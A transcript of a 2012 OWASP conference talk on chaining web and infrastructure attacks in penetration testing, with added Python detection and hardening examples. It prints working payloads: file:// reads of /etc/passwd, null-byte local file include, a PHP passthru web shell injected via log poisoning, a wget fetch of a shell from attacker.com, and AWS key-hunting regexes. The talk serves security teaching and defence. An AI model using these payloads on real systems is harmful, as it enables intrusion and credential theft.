Attack Chaining: Advanced Maneuvers for Hack Fu
DESCRIPTION
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
TRANSCRIPT
![Page 1: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/1.jpg)
Attack Chaining: Advanced Maneuvers for Hack Fu
OWASP ATL
31 May 2012
![Page 2: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/2.jpg)
About Us: Who Are These Dudes?
• Rob, Sr. Security Associate @ Stach & Liu
• Oscar, Security Associate @ Stach & Liu
![Page 3: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/3.jpg)
Penetration Test vs. Vulnerability Assessment
![Page 4: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/4.jpg)
vs.
![Page 5: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/5.jpg)
Simulate a real-world attack against a target network or application.
- EVERYBODY
![Page 6: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/6.jpg)
It answers the question, “could someone break in?”
![Page 7: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/7.jpg)
Penetration Testing
1. Information Gathering
2. Exploit & Penetrate
3. Escalate Privileges
4a. Maintain Access
4b. Deny Access
![Page 8: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/8.jpg)
Pen Testing Scenario
• Web application penetration test
• Cloud-based infrastructure hosts multiple sites
• Out-sourced PHP development to many contractors
• Determine an attacker's ability to compromise PII or infrastructure
![Page 9: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/9.jpg)
Step 1 – Explore
![Page 10: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/10.jpg)
Step 2 – Read Code
http://vuln.com/dir/share.js
```javascript
...
AJAX.Call({ method:'POST', url:'include/s_proxy.php' ...
```
![Page 11: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/11.jpg)
Step 3 – Proxy?
http://vuln.com/dir/include/s_proxy.php?redirect_url=http://www.google.com
![Page 12: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/12.jpg)
Step 4 – Read Local Files!
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd
![Page 13: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/13.jpg)
Attack Chaining – Maneuver 1
![Page 14: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/14.jpg)
Attack Chaining – Maneuver 1
![Page 15: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/15.jpg)
Step 5 – Gather More Info
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/httpd.conf
![Page 16: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/16.jpg)
Step 6 – Keep Going…
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
![Page 17: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/17.jpg)
Step 6 – Keep Going…
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
```apache
<VirtualHost *>
    ServerName vuln.com
    DocumentRoot /var/www/sites/vuln.com/docroot
    ErrorLog logs/vuln.com_error_log
</VirtualHost>
```
![Page 18: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/18.jpg)
Step 7 – Back to DirBuster
![Page 19: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/19.jpg)
Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
![Page 20: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/20.jpg)
Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
```php
<?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
// Request-controlled module and action are concatenated straight into the include path
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile);
exit;
?>
```
![Page 21: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/21.jpg)
Attack Chaining – Maneuver 2
![Page 22: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/22.jpg)
Attack Chaining – Maneuver 2
![Page 23: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/23.jpg)
Step 9 – Null Byte Injection
http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00
![Page 24: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/24.jpg)
Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
```php
<?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
// Request-controlled module and action are concatenated straight into the include path
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile);
exit;
?>
```
![Page 25: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/25.jpg)
Step 10 – Review Gathered Info
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
![Page 26: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/26.jpg)
Step 10 – Back to Virtual Conf
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
```apache
<VirtualHost *>
    ServerName vuln.com
    DocumentRoot /var/www/sites/vuln.com/docroot
    ErrorLog logs/vuln.com_error_log
</VirtualHost>
```
![Page 27: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/27.jpg)
Step 11 – Where To Stick It?
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
```
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
```
![Page 28: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/28.jpg)
Step 12 – Poison Logs
![Page 29: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/29.jpg)
Step 12 – Poison Logs
![Page 30: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/30.jpg)
Step 12 – Poison Logs
```php
<? echo '<pre>'; passthru($_GET['cmd']); echo '</pre>'; ?>
```
![Page 31: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/31.jpg)
Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
```
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
```
![Page 32: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/32.jpg)
Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
```
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo '<pre>';passthru($_GET['cmd']);echo '</pre>'; ?>
```
![Page 33: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/33.jpg)
Step 14 – Execute Code
http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls;
```
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
```
![Page 34: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/34.jpg)
Step 14 – Execute Code
```php
<? echo '<pre>'; passthru('ls'); echo '</pre>'; ?>
```
```
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
```
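The detection side of steps 9 to 14, added here as an editor's example rather than code from the deck: a small Python scanner that flags the two indicator families this chain leaves behind, a PHP open tag written into an Apache error-log entry (log poisoning via the referer) and null bytes, traversal or a file: scheme in a request's query string (the s_proxy.php and controller.php payloads). The sample error-log lines are constructed after the two shown on the slides.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A PHP open tag followed by "php", "=" or whitespace: "<? echo ..." or "<?php ...".
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)

# Constructed sample error-log lines, modelled on the two shown on the slides.
SAMPLE_ERROR_LOG = [
    "[error] [client 10.10.65.18] File does not exist: "
    "/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, "
    "referer: http://www.vuln.com/",
    "[error] [client 10.10.65.18] File does not exist: "
    "/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, "
    "referer: <? echo '<pre>';passthru($_GET['cmd']);echo '</pre>'; ?>",
]


def scan_error_log_line(line):
    """Findings for one Apache error-log line. A PHP tag anywhere in the entry
    means client-controlled input (referer, user agent, requested path) has
    been written into a file that a local file include could later execute."""
    return ["php_tag"] if PHP_TAG.search(line) else []


def scan_request(url):
    """Findings for one request URL. parse_qsl decodes the query once, so %00
    becomes a NUL byte and %2e%2e%2f becomes ../ before the checks run."""
    findings = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if "\x00" in value:
            findings.add("null_byte")        # include() truncation trick
        if "../" in value or "..\\" in value:
            findings.add("path_traversal")   # walking out of modules/
        if value.lower().startswith("file:"):
            findings.add("file_scheme")      # proxy turned into a file reader
    return sorted(findings)


def scan_error_log(lines):
    """(1-based line number, findings) for every line that raised a finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = scan_error_log_line(line)
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    print(scan_error_log(SAMPLE_ERROR_LOG))
    for url in (
        "http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd",
        "http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00",
    ):
        print(url, scan_request(url))
```

Run the request scanner over the access log and the tag scanner over the error log; a php_tag hit on a file that is reachable through a file-read primitive is the combination that matters.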
![Page 35: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/35.jpg)
Attack Chaining – Maneuver 3
![Page 36: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/36.jpg)
Attack Chaining – Maneuver 3
![Page 37: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/37.jpg)
Step 15 – Upload Shell
http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=wget%20http://attacker.com/gny.php;
![Page 38: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/38.jpg)
Step 16 – Enjoy!
![Page 39: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/39.jpg)
Step 17 – I want more!
```
ec2[^\d]["'][A-Z0-9]{20}["']
ec2.*["'][A-Z0-9]{20}["']
["'][A-Za-z0-9+/]{40}["']
ec2.*["'][A-Z0-9]{20}["']
ec2(\D)*["'][A-Z0-9]{20}["']
amazon.*["'][A-Z0-9]{20}["']
(amazon|ec2).*["'][A-Z0-9]{20}["']
amazon(\D)*["'][A-Z0-9]{20}["']
access
secret
["'][A-Z0-9]{20}["']
[A-Za-z0-9+/]{40}
amazon.*["'][A-Z0-9]{20}["'].*["'][A-Za-z0-9+/]{40}["']
aws.*["'][A-Z0-9]{20}["']
["'][A-Za-z0-9+/]{40}["']
amazon.*["'][A-Z0-9]{20}["']
["'][A-Za-z0-9+/]{40}["']
secret.*["'][A-Za-z0-9+/]{40}["']
["'][A-Za-z0-9+/]{40}["'].*amazon
```
![Page 40: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/40.jpg)
Step 18 – Amazon AWS Regex
```php
$this->amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628',
$aws_key = '8AFB5AF55D1E6620EE1';
define('AMAZON_KEY', '372B8E408D1484C538F');
if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884');
//if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C');
define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
```
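The regexes from steps 17 and 18 turned into a pre-commit secret scanner, added here as an editor's example and not code from the deck: it runs the deck's two value shapes (a quoted 20-character [A-Z0-9] access key ID and a quoted 40-character [A-Za-z0-9+/] secret, each preceded on the line by an amazon/aws/ec2/access/secret keyword) over constructed PHP config lines modelled on the slide above. The planted values are AWS's published documentation example credentials, and findings are reported redacted.

```python
import re

# The deck's two value shapes: a 20-char [A-Z0-9] access key ID and a 40-char
# [A-Za-z0-9+/] secret, each quoted and preceded on the line by a keyword.
# (?i:...) keeps the keyword case-insensitive without loosening the key classes.
KEYWORD = r"(?i:amazon|aws|ec2|access|secret)"
ACCESS_KEY_ID = re.compile(KEYWORD + r".*?[\"']([A-Z0-9]{20})[\"']")
SECRET_KEY = re.compile(KEYWORD + r".*?[\"']([A-Za-z0-9+/]{40})[\"']")

# Constructed PHP config lines modelled on the slide above. The planted values
# are AWS's published documentation examples, not real credentials.
SAMPLE_CONFIG = [
    "<?php",
    "define('AMAZON_KEY', 'AKIAIOSFODNN7EXAMPLE');",
    "$aws_secret = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY';",
    "//if (!defined('awsAccessKey')) define('awsAccessKey', 'AKIAIOSFODNN7EXAMPLE');",
    "$this->amazonService = new Zend_Service_Amazon(getenv('AWS_ACCESS_KEY_ID'),",
    "                                               getenv('AWS_SECRET_ACCESS_KEY'));",
    "$db_host = 'localhost';",
]


def redact(value):
    """Report enough to locate the credential, never the whole value."""
    return value[:4] + "..." + value[-4:]


def scan_config(lines):
    """Return (1-based line number, kind, redacted value) for every hit.
    Commented-out lines are still reported: the key is still on disk and
    still readable through the file-read primitive shown earlier."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for kind, pattern in (("access_key_id", ACCESS_KEY_ID),
                              ("secret_key", SECRET_KEY)):
            for value in pattern.findall(line):
                hits.append((number, kind, redact(value)))
    return hits


if __name__ == "__main__":
    for hit in scan_config(SAMPLE_CONFIG):
        print(hit)
```

The getenv() lines in the sample show the remediated form for root cause 4 on slide 47: credentials read from the environment or a secret store produce no hit because nothing key-shaped is left in the file.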
![Page 41: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/41.jpg)
Step 19 – AWS Takeover
![Page 42: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/42.jpg)
Step 20 – Make It Your Own
![Page 43: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/43.jpg)
Cost of Amazon Cloud Compromise
1. Found 8 Amazon Secret Keys to access Amazon S3
2. Found that 2 of the 8 have administrator access to Amazon EC2
3. Attacker launches 100 Extra Large Clusters
$1,049,000
CRITICAL EXPOSURE
![Page 44: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/44.jpg)
Take Them Off The Web
1. Found 8 Amazon Secret Keys to access Amazon S3
2. Found that 2 of the 8 have administrator access to Amazon EC2
3. Attacker shuts down and deletes all servers and backups permanently
PRICELESS
CRITICAL EXPOSURE
![Page 45: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/45.jpg)
Attack Chaining – Hack Fu
![Page 46: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/46.jpg)
Attack Chaining – Hack Fu
![Page 47: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/47.jpg)
Why Is This Happening?
1. Local File Include
   • File Read Only
   • Code Execution
2. Null Byte Injection
3. Log Poisoning
4. Insecure Credential Storage
5. Overly Permissive Amazon AWS Keys
6. Sensitive Information Disclosure
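Root causes 1 to 3 above fixed at the input boundary, as an added editor's example that is not the deck's code: the controller.php include and the s_proxy.php redirect_url handler modelled in Python with assumed allowlists (ALLOWED_MODULES, ALLOWED_REDIRECT_HOSTS, and MODULE_ROOT derived from the DocumentRoot on slide 17 plus dir/include), so the slides' payloads are refused while the intended pages and hosts still work. The same two checks port directly to PHP with preg_match() and in_array().

```python
import re
from urllib.parse import urlsplit

# Assumed allowlists: the only module/action pairs and redirect hosts the app
# actually needs. MODULE_ROOT is where the slides' relative 'modules/' resolves
# from controller.php (DocumentRoot from slide 17 plus dir/include); assumed.
ALLOWED_MODULES = {"news": {"list", "view"}, "account": {"profile"}}
ALLOWED_REDIRECT_HOSTS = {"www.vuln.com", "www.google.com"}
MODULE_ROOT = "/var/www/sites/vuln.com/docroot/dir/include/modules"
NAME = re.compile(r"[a-z][a-z0-9_]{0,31}")   # no '/', '.', NUL or anything else


def resolve_module_file(module, action):
    """Hardened counterpart of include('modules/'.$module.'/'.$action.'.php').
    Returns the file to include, or None when the request must be refused."""
    if not (NAME.fullmatch(module) and NAME.fullmatch(action)):
        return None          # refuses ../, %00, absolute paths, odd characters
    if action not in ALLOWED_MODULES.get(module, ()):
        return None          # refuses well-formed names that are not real pages
    return f"{MODULE_ROOT}/{module}/{action}.php"


def safe_redirect_target(url):
    """Hardened counterpart of the s_proxy.php redirect_url handler: http(s)
    only and allowlisted hosts only, so file:///etc/passwd and arbitrary
    external hosts are both refused."""
    if "\x00" in url:
        return None
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    if parts.username is not None or parts.password is not None:
        return None          # http://www.google.com@evil.example/ style tricks
    if (parts.hostname or "").lower() not in ALLOWED_REDIRECT_HOSTS:
        return None
    return url


if __name__ == "__main__":
    print(resolve_module_file("news", "view"))
    print(resolve_module_file("../../../../../../etc/passwd\x00", "index"))
    print(safe_redirect_target("http://www.google.com"))
    print(safe_redirect_target("file:///etc/passwd"))
```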
![Page 48: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/48.jpg)
Web → Mass Malware Deployment
![Page 49: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/49.jpg)
Web → Data Center Compromise
![Page 50: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/50.jpg)
Web → Internal Network Compromise
![Page 51: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/51.jpg)
Internal Assessment → SSN & Bank #'s
![Page 52: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/52.jpg)
Infrastructure Review
![Page 53: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/53.jpg)
Step 1 – Target Wireless
![Page 54: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/54.jpg)
Step 1 – Target Wireless
![Page 55: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/55.jpg)
Step 2 – Port Scan
![Page 56: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/56.jpg)
Step 3 – Test Default Creds
![Page 57: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/57.jpg)
Infrastructure Apocalypse
![Page 58: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/58.jpg)
Step 4 – Control AP
![Page 59: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/59.jpg)
Step 5 – Read All E-mail
![Page 60: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/60.jpg)
Step 6 – Listen To VOIP
![Page 61: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/61.jpg)
Step 7 – Open All Doors
![Page 62: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/62.jpg)
Step 7 – Open All Doors
![Page 63: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/63.jpg)
![Page 64: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/64.jpg)
Step 7 – Server Room Door
![Page 65: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/65.jpg)
Is This Real Life?
1. Insecure Wireless Encryption
2. Improper Network Segmentation
3. Insecure Default Configuration
4. Weak Passwords
5. Sensitive Information Disclosure
![Page 66: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/66.jpg)
Protection – How?
1. People
2. Policy
3. Processes
4. Strategic / Tactical Security
5. Defense In-Depth
![Page 67: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/67.jpg)
Defense In-Depth
Is Protection Against...
![Page 68: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/68.jpg)
How Do You Get Better?
![Page 69: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/69.jpg)
Synthesis and Patterns: Can Be Both Good and Bad
![Page 70: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/70.jpg)
Attack Visualization: Like Bobby Fischer
![Page 71: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/71.jpg)
![Page 72: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/72.jpg)
Thank You